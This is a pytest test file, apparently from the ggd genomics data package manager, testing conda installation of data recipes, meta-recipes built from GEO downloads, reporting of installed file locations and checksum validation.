assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
#### Uninstall package
args = Namespace(channel='genomics', command='uninstall', names=[name])
uninstall.uninstall((),args)
## Test with multiple in the list
ggd_recipes = ["grch38-chromsizes-ggd-v1","hg38-chromsizes-ggd-v1"]
assert install.conda_install(ggd_recipes, ggd_channel,jdict) == True
for name in ggd_recipes:
pkg_info = get_conda_package_list(utils.conda_root(),name)
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
args = Namespace(channel='genomics', command='uninstall', names=ggd_recipes)
assert uninstall.uninstall((),args) == True
def test_conda_install_with_prefix_set():
"""
Test conda install function for proper installation of a ggd recipe using conda
"""
pytest_enable_socket()
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env4")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env4"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env4"])
name = "hg19-pfam-domains-ucsc-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(name,ggd_channel)
os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
assert install.conda_install([name], ggd_channel,jdict,prefix=temp_env) == True
species = jdict["packages"][name]["identifiers"]["species"]
build = jdict["packages"][name]["identifiers"]["genome-build"]
version = jdict["packages"][name]["version"]
file1 = "{}.bed12.bed.gz".format(name)
file2 = "{}.bed12.bed.gz.tbi".format(name)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,file2)) == False
## Test that the tarfile and the pkg dir were correctly copied to the prefix
data_packages = get_conda_package_list(temp_env)
version = str(data_packages[name]["version"])
build_number = str(data_packages[name]["build"])
tarfile = "{}-{}-{}.tar.bz2".format(name,version,build_number)
pkgdir = "{}-{}-{}".format(name,version,build_number)
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
### Test that the ggd_info metadata is updated with ggd pkg
pkg_info = get_conda_package_list(temp_env,name)
assert name in pkg_info.keys()
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","channeldata.json"))
with open(os.path.join(temp_env,"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
## Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env4"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_conda_install_meta_recipe():
"""
Test that the conda_install() method correctly install a meta recipe.
"""
import tarfile
import tempfile
from ggd import check_recipe
tmpdir = tempfile.mkdtemp()
recipe_path = os.path.join(tmpdir,"gse123-geo-v1")
os.mkdir(recipe_path)
## Download files
try:
## checkusm
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/checksums_file.txt",
"--directory-prefix",
recipe_path])
## meta.yaml
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/meta.yaml",
"--directory-prefix",
recipe_path])
## metarecipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/metarecipe.sh",
"--directory-prefix",
recipe_path])
## head parser
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/parse_geo_header.py",
"--directory-prefix",
recipe_path])
## Post link
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/post-link.sh",
"--directory-prefix",
recipe_path])
## recipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/recipe.sh",
"--directory-prefix",
recipe_path])
except sp.CalledProcessError as e:
print(str(e))
assert False
## update the name
for f in os.listdir(recipe_path):
content = [x.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1") for x in open(os.path.join(recipe_path,f))]
with open(os.path.join(recipe_path,f), "w") as out:
out.write("".join(content))
## Original yaml
orig_yaml = yaml.safe_load(open(os.path.join(recipe_path, "meta.yaml")))
tarball_file_path = check_recipe._build(recipe_path,orig_yaml)
assert os.path.isfile(tarball_file_path)
## Set up chanel metadata dict
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'gse123-geo-v1': {u'activate.d':
False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/gse123-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
u'meta-recipe', u'species': u'meta-recipe'}}}}
## Test installing a meta recipe wihtout a meta=recipe designation
passed = False
try:
install.conda_install(ggd_recipes=["gse123-geo-v1"],
ggd_channel = "genomics",
ggd_jdict = ggd_jdict,
debug = False,
prefix = None,
meta_recipe = False,
meta_recipe_name = "meta-recipe-geo-accession-v1")
passed = True
except SystemExit as e:
pass
except Exception as e:
assert False
assert not passed
## Test meta recipe with no env vars added
env_var_tmp_dir, env_var_file_path, final_commands_files = utils.create_tmp_meta_recipe_env_file()
## Set environ vars
os.environ["GGD_METARECIPE_ID"] = "GSE123"
os.environ["GGD_METARECIPE_ENV_VAR_FILE"] = env_var_file_path
os.environ["GGD_METARECIPE_FINAL_COMMANDS_FILE"] = final_commands_files
## Test that the recipe is installed, the recipe.sh file is upadated, and the meta.yaml file is updated
assert install.conda_install(ggd_recipes=["gse123-geo-v1"],
ggd_channel = "genomics",
ggd_jdict = ggd_jdict,
debug = False,
prefix = None,
meta_recipe = True,
meta_recipe_name = "meta-recipe-geo-accession-v1")
recipe_contents = ""
yaml_dict = {}
with tarfile.open(os.path.join(utils.conda_root(),"pkgs",os.path.basename(tarball_file_path)), mode="r|bz2") as tf:
for info in tf:
if info.name == "info/recipe/recipe.sh":
recipe_contents = tf.extractfile(info)
recipe_contents = recipe_contents.read().decode()
elif info.name == "info/recipe/meta.yaml.template":
yaml_dict = tf.extractfile(info)
yaml_dict = yaml.safe_load(yaml_dict.read().decode())
## Check the recipe contents
assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")
## check the yaml file
assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
assert yaml_dict["package"]["name"] == orig_yaml["package"]["name"]
assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
assert "updated-species" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-v1"
assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]
## Check the installed files
species = "meta-recipe"
build = "meta-recipe"
name = "gse123-geo-v1"
version = "1"
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert not os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exists after install it
## remove the temp dir
if os.path.exists(env_var_tmp_dir):
shutil.rmtree(env_var_tmp_dir)
## uninstall
sp.check_call(["ggd","uninstall","gse123-geo-v1"])
## Check different prefix
## Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_meta_recipe")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_meta_recipe"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_meta_recipe"])
## Build the recipe
tarball_file_path = check_recipe._build(recipe_path,orig_yaml)
assert os.path.isfile(tarball_file_path)
## Test meta recipe with no env vars added
env_var_tmp_dir, env_var_file_path, final_commands_files = utils.create_tmp_meta_recipe_env_file()
## Set environ vars
os.environ["GGD_METARECIPE_ID"] = "GSE123"
os.environ["GGD_METARECIPE_ENV_VAR_FILE"] = env_var_file_path
os.environ["GGD_METARECIPE_FINAL_COMMANDS_FILE"] = final_commands_files
os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
assert install.conda_install(ggd_recipes=["gse123-geo-v1"],
ggd_channel = "genomics",
ggd_jdict = ggd_jdict,
debug = False,
prefix = temp_env,
meta_recipe = True,
meta_recipe_name = "meta-recipe-geo-accession-v1")
recipe_contents = ""
yaml_dict = {}
with tarfile.open(os.path.join(temp_env,"pkgs",os.path.basename(tarball_file_path)), mode="r|bz2") as tf:
for info in tf:
if info.name == "info/recipe/recipe.sh":
recipe_contents = tf.extractfile(info)
recipe_contents = recipe_contents.read().decode()
elif info.name == "info/recipe/meta.yaml.template":
yaml_dict = tf.extractfile(info)
yaml_dict = yaml.safe_load(yaml_dict.read().decode())
## Check the recipe contents
assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")
## check the yaml file
assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
assert yaml_dict["package"]["name"] == orig_yaml["package"]["name"]
assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
assert "updated-species" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-v1"
assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]
## Check the installed files
species = "meta-recipe"
build = "meta-recipe"
name = "gse123-geo-v1"
version = "1"
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert not os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exists after install it
## Check that the recipe was not installed in the current environment
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz")) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) == False
## Test that the tarfile and the pkg dir were correctly copied to the prefix
data_packages = get_conda_package_list(temp_env, include_local = True)
version = str(data_packages[name]["version"])
build_number = str(data_packages[name]["build"])
tarfile = "{}-{}-{}.tar.bz2".format(name,version,build_number)
pkgdir = "{}-{}-{}".format(name,version,build_number)
assert os.path.isfile(os.path.join(temp_env,"pkgs",tarfile))
assert os.path.isdir(os.path.join(temp_env,"pkgs",pkgdir))
### Test that the ggd_info metadata is updated with ggd pkg
pkg_info = get_conda_package_list(temp_env,name, include_local = True)
assert name in pkg_info.keys()
version = pkg_info[name]["version"]
build = pkg_info[name]["build"]
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch"))
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
assert os.path.exists(os.path.join(temp_env,"share","ggd_info","channeldata.json"))
with open(os.path.join(temp_env,"share","ggd_info","channeldata.json")) as jfile:
channeldata = json.load(jfile)
assert name in channeldata["packages"]
## Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_meta_recipe"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
## remove the temp dir
if os.path.exists(env_var_tmp_dir):
shutil.rmtree(env_var_tmp_dir)
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
def test_get_file_location():
"""
Test that get_file_location function to properly reterive the location of the ggd file
"""
pytest_enable_socket()
## Fake recipe
ggd_recipe = "Fake_hg19-gaps"
ggd_channel = "genomics"
jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
{}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
u'hg19', u'species': u'Homo_sapiens'}}}}
species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
version = jdict["packages"][ggd_recipe]["version"]
CONDA_ROOT = utils.conda_root()
path = os.path.join(CONDA_ROOT,"share","ggd",species,build,ggd_recipe,version)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.get_file_locations([ggd_recipe],jdict)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: There was an error during installation" in output
assert ":ggd:install: Installed file locations" in output
assert ggd_recipe in output
assert "$ggd_{}_dir".format(ggd_recipe.replace("-","_")) not in output
assert "$ggd_{}_file".format(ggd_recipe.replace("-","_")) not in output
ggd_recipe = "grch37-chromsizes-ggd-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
assert install.install_from_cached([ggd_recipe], ggd_channel,jdict) == True
jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
version = jdict["packages"][ggd_recipe]["version"]
CONDA_ROOT = utils.conda_root()
path = os.path.join(CONDA_ROOT,"share","ggd",species,build,ggd_recipe,version)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.get_file_locations([ggd_recipe],jdict)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: Installed file locations" in output
assert ggd_recipe in output
assert "$ggd_{}_dir".format(ggd_recipe.replace("-","_")) in output
assert "$ggd_{}_file".format(ggd_recipe.replace("-","_")) in output
assert path in output
try:
args = Namespace(channel='genomics', command='uninstall', names=[ggd_recipe])
uninstall.uninstall((),args)
except:
pass
def test_get_file_location_with_prefix_set():
"""
Test that get_file_location function to properly reterive the location of the ggd file when it is associated with a different prefix (conda environment)
"""
pytest_enable_socket()
### Temp conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_env5")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_env5"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_env5"])
### Install the recipe
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
ggd_channel = "genomics"
jdict = install.check_ggd_recipe(ggd_recipe,ggd_channel)
species = jdict["packages"][ggd_recipe]["identifiers"]["species"]
build = jdict["packages"][ggd_recipe]["identifiers"]["genome-build"]
version = jdict["packages"][ggd_recipe]["version"]
os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
assert install.install_from_cached([ggd_recipe], ggd_channel,jdict,prefix=temp_env) == True
path = os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version)
### Test output from get file location
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.get_file_locations([ggd_recipe],jdict,prefix=temp_env)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: Installed file locations" in output
assert ggd_recipe in output
assert "$ggd_{}_dir".format(ggd_recipe.replace("-","_")) in output
assert "$ggd_{}_file".format(ggd_recipe.replace("-","_")) in output
assert path in output
assert ":ggd:install: NOTE: These environment variables are specific to the {p} conda environment and can only be accessed from within that environment".format(p=temp_env) in output
### Test the file exists in the correct prefix and not the current prefix
file1 = "{}.bed12.bed.gz".format(ggd_recipe)
file2 = "{}.bed12.bed.gz.tbi".format(ggd_recipe)
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file1))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_recipe,version,file2))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file1)) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_recipe,version,file2)) == False
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_env5"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
def test_install_checksum():
"""
Test the install_checksum method
"""
pytest_enable_socket()
## Create test recipe
recipe = CreateRecipe(
"""
trial-recipe-v1:
meta.yaml: |
build:
binary_relocation: false
detect_binary_files_with_prefix: false
noarch: generic
number: 0
extra:
authors: mjc
extra-files: []
package:
name: trial-recipe-v1
version: '1'
requirements:
build:
- gsort
- htslib
- zlib
run:
- gsort
- htslib
- zlib
source:
path: .
about:
identifiers:
genome-build: hg38
species: Homo_sapiens
keywords:
- gaps
- region
summary: hg38 Assembly gaps from USCS
tags:
genomic-coordinate-base: 0-based-inclusive
data-version: 11-Mar-2019
data-provider: UCSC
file-type:
- genome
final-file-sizes:
hg19-chromsizes-ggd-v1.txt: 1.99K
final-files:
- trial-recipe-v1.genome
ggd-channel: genomics
recipe.sh: |
#!/bin/sh
set -eo pipefail -o nounset
wget https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/genomes/Homo_sapiens/hg19/hg19.genome
post-link.sh: |
set -eo pipefail -o nounset
if [[ -z $(conda info --envs | grep "*" | grep -o "\/.*") ]]; then
export CONDA_ROOT=$(conda info --root)
env_dir=$CONDA_ROOT
export RECIPE_DIR=$CONDA_ROOT/share/ggd/Homo_sapiens/hg38/trial-recipe-v1/1
elif [[ $(conda info --envs | grep "*" | grep -o "\/.*") == "base" ]]; then
export CONDA_ROOT=$(conda info --root)
env_dir=$CONDA_ROOT
export RECIPE_DIR=$CONDA_ROOT/share/ggd/Homo_sapiens/hg38/trial-recipe-v1/1
else
env_dir=$(conda info --envs | grep "*" | grep -o "\/.*")
export CONDA_ROOT=$env_dir
export RECIPE_DIR=$env_dir/share/ggd/Homo_sapiens/hg38/trial-recipe-v1/1
fi
PKG_DIR=`find "$CONDA_SOURCE_PREFIX/pkgs/" -name "$PKG_NAME-$PKG_VERSION*" | grep -v ".tar.bz2" | grep "$PKG_VERSION.*$PKG_BUILDNUM$"`
if [ -d $RECIPE_DIR ]; then
rm -r $RECIPE_DIR
fi
mkdir -p $RECIPE_DIR
(cd $RECIPE_DIR && bash $PKG_DIR/info/recipe/recipe.sh)
cd $RECIPE_DIR
## Iterate over new files and replace file name with data package name and data version
for f in *; do
ext="${f#*.}"
filename="{f%%.*}"
(mv $f "trial-recipe-v1.$ext")
done
## Add environment variables
#### File
if [[ `find $RECIPE_DIR -type f -maxdepth 1 | wc -l | sed 's/ //g'` == 1 ]] ## If only one file
then
recipe_env_file_name="ggd_trial-recipe-v1_file"
recipe_env_file_name="$(echo "$recipe_env_file_name" | sed 's/-/_/g')"
file_path="$(find $RECIPE_DIR -type f -maxdepth 1)"
elif [[ `find $RECIPE_DIR -type f -maxdepth 1 | wc -l | sed 's/ //g'` == 2 ]] ## If two files
then
indexed_file=`find $RECIPE_DIR -type f \( -name "*.tbi" -or -name "*.fai" -or -name "*.bai" -or -name "*.crai" -or -name "*.gzi" \) -maxdepth 1`
if [[ ! -z "$indexed_file" ]] ## If index file exists
then
recipe_env_file_name="ggd_trial-recipe-v1_file"
recipe_env_file_name="$(echo "$recipe_env_file_name" | sed 's/-/_/g')"
file_path="$(echo $indexed_file | sed 's/\.[^.]*$//')" ## remove index extension
fi
fi
#### Dir
recipe_env_dir_name="ggd_trial-recipe-v1_dir"
recipe_env_dir_name="$(echo "$recipe_env_dir_name" | sed 's/-/_/g')"
activate_dir="$env_dir/etc/conda/activate.d"
deactivate_dir="$env_dir/etc/conda/deactivate.d"
mkdir -p $activate_dir
mkdir -p $deactivate_dir
echo "export $recipe_env_dir_name=$RECIPE_DIR" >> $activate_dir/env_vars.sh
echo "unset $recipe_env_dir_name">> $deactivate_dir/env_vars.sh
#### File
if [[ ! -z "${recipe_env_file_name:-}" ]] ## If the file env variable exists, set the env file var
then
echo "export $recipe_env_file_name=$file_path" >> $activate_dir/env_vars.sh
echo "unset $recipe_env_file_name">> $deactivate_dir/env_vars.sh
fi
echo 'Recipe successfully built!'
checksums_file.txt: |
trial-recipe-v1.genome\t54416e6d1884e0178e5819fbd4f3a38f
""", from_string=True)
recipe.write_recipes()
from ggd import check_recipe
## Check if the recipe is already installed
if "trail-recipe-v1" in sp.check_output(["conda list {}".format("trail-recipe-v1")], shell=True).decode("utf8"):
sp.check_output(["conda uninstall trail-recipe-v1 -y"], shell = True)
## Create recipe
recipe_dir_path = recipe.recipe_dirs["trial-recipe-v1"]
## Remove checksum file
#os.remove(os.path.join(recipe_dir_path,"checksums_file.txt"))
## build tar.bz2 file and install
yaml_file = yaml.safe_load(open(os.path.join(recipe_dir_path, "meta.yaml")))
tarball_file_path = check_recipe._build(recipe_dir_path,yaml_file)
assert os.path.isfile(tarball_file_path)
## Install recipe
assert check_recipe._install(tarball_file_path, "trial-recipe-v1") == True
## Fake ggd_jdict
ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'trial-recipe-v1':
{u'activate.d': False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics',
u'data-version': u'11-Mar-2019',u'file-type':u'bed',u'final-files':[u'trial-recipe-v1.genome']},
u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink': False,
u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package': u'noarch/trial-recipe-v1-1-1.tar.bz2',
u'pre_link': False, u'keywords': [u'gaps', u'region'], u'summary': u'hg38 Assembly gaps from USCS',
u'text_prefix': False, u'identifiers': {u'genome-build': u'hg38', u'species': u'Homo_sapiens'}}}}
## Test good checksum
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install_checksum(["trial-recipe-v1"],ggd_jdict)
output = temp_stdout.getvalue().strip()
assert ":ggd:install: Checksum for trial-recipe-v1" in output
assert ":ggd:checksum: installed file checksum: trial-recipe-v1.genome checksum: 54416e6d1884e0178e5819fbd4f3a38f" in output
assert ":ggd:checksum: metadata checksum record: trial-recipe-v1.genome checksum: 54416e6d1884e0178e5819fbd4f3a38f" in output
assert ":ggd:install: ** Successful Checksum **" in output
## Create fake recipes
fakerecipe = CreateRecipe(
"""
trial_recipe_dir1:
info:
recipe:
checksums_file.txt: |
trial-recipe-v1.genome\taj09f239a;ojveiaj289j
trial_recipe_dir2:
info:
recipe:
bad_checksums_file.txt: |
not a real checksum file
""", from_string=True)
fakerecipe.write_nested_recipes()
trial_recipe1_path = fakerecipe.recipe_dirs["trial_recipe_dir1"]
trial_recipe2_path = fakerecipe.recipe_dirs["trial_recipe_dir2"]
if os.path.exists(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2")):
os.remove(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2"))
import tarfile
tar = tarfile.open(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2"), "w:bz2")
tar.add(trial_recipe2_path, arcname=(""))
tar.close()
## Test a tar.bz2 without checksum file
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
install.install_checksum(["trial-recipe-v1"],ggd_jdict)
output2 = temp_stdout.getvalue().strip()
assert ":ggd:install: WARNING: Checksum file not available for the trial-recipe-v1 data package. Data file content validation will be skipped" in output2
## Bad checksum
tar = tarfile.open(os.path.join(utils.conda_root(),"pkgs","trial-recipe-v1-1-0.tar.bz2"), "w:bz2")
tar.add(trial_recipe1_path, arcname=(""))
tar.close()
try:
install.install_checksum(["trial-recipe-v1"],ggd_jdict)
assert False
except ChecksumError as e:
assert "Data file content validation failed. The trial-recipe-v1 data package did not install correctly" in str(e)
except Exception as e:
print(str(e))
assert False
## Test without installed files in it
## Get install path
species = ggd_jdict["packages"]["trial-recipe-v1"]["identifiers"]["species"]
build = ggd_jdict["packages"]["trial-recipe-v1"]["identifiers"]["genome-build"]
version = ggd_jdict["packages"]["trial-recipe-v1"]["version"]
install_path = os.path.join(utils.conda_root(),"share","ggd",species,build,"trial-recipe-v1",version)
shutil.rmtree(install_path)
try:
install.install_checksum(["trial-recipe-v1"],ggd_jdict)
assert False
except ChecksumError as e:
assert "Data file content validation failed. The trial-recipe-v1 data package did not install correctly" in str(e)
except Exception:
print(str(e))
assert False
sp.check_output(["conda","uninstall", "-y", "trial-recipe-v1"])
# ## Test a good checksum
# recipe = "grch37-chromsizes-ggd-v1"
# args = Namespace(channel='genomics', command='install', debug=False, name=[recipe], file=[], prefix=None)
# assert install.install((), args) == True
#
